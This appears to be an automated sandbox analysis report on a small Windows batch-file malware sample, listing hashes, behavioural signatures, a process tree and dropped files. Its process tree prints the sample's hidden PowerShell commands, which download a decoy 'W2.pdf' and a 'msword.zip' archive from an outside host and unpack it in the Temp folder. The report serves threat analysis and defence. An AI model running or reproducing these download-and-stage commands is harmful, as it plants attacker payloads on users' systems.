Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-01-2025 02:54
Static task
static1
Behavioral task
behavioral1
Sample
91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e.bat
Resource
win7-20240903-en
General
-
Target
91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e.bat
-
Size
498B
-
MD5
e8dfdb915a523a09e139aaa900991ddd
-
SHA1
d23f4798c549bfb7ddd968c4c2a971f67468a662
-
SHA256
91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e
-
SHA512
b4e737d1c80420688bf856df02a580b691d120307b7d31ea4766448ccd0c6eec7b2c48424691e92dffba58ca8c9a8df989f5b683d9363cac37d3dd3e5ad1623e
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 824 powershell.exe 2664 powershell.exe 2848 powershell.exe 824 powershell.exe 2664 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 824 powershell.exe 2664 powershell.exe 2848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 824 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2848 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 3060 wrote to memory of 824 3060 cmd.exe 32 PID 3060 wrote to memory of 824 3060 cmd.exe 32 PID 3060 wrote to memory of 824 3060 cmd.exe 32 PID 3060 wrote to memory of 2664 3060 cmd.exe 33 PID 3060 wrote to memory of 2664 3060 cmd.exe 33 PID 3060 wrote to memory of 2664 3060 cmd.exe 33 PID 3060 wrote to memory of 2848 3060 cmd.exe 34 PID 3060 wrote to memory of 2848 3060 cmd.exe 34 PID 3060 wrote to memory of 2848 3060 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\Admin\Downloads\W2.pdf"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\Admin\AppData\Local\Temp\msword.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\msword -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a2ada31d22f3e81d58fa0d0bb90803c3
SHA12c3a2b74b0d9fd42ea3f6d51ec562a25060ecebd
SHA2564df882e347ba7beb9d34e5612fd098b96652301f7551112d405b194f297b10eb
SHA5127be7492e245d43abc8444dd6d636c851322fab2198fe0b78aa09ca02a82157c391ea2e819d81e23d9bc350006e7a9f4f83dde0fffba854ebc2ed79365a3a55f8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LECFGTK8JPRLN2MCHCUX.temp
Filesize7KB
MD507b3c9f88ad3037151130c2ec8b488c2
SHA1ffd6e69e5b7f4e6a712da7b93e2eadf9633ba93d
SHA256272ad5961b755888013b771c9814aa0813be57be98f38635e085d3561954eb11
SHA5125d85bb8ae3bead20933a494d7a6eb3c477487a35175565db635f34a11e5770117665bda9b63808fcdb0b1b35c122002aa02653bef55dc2babd79debb69a30f4a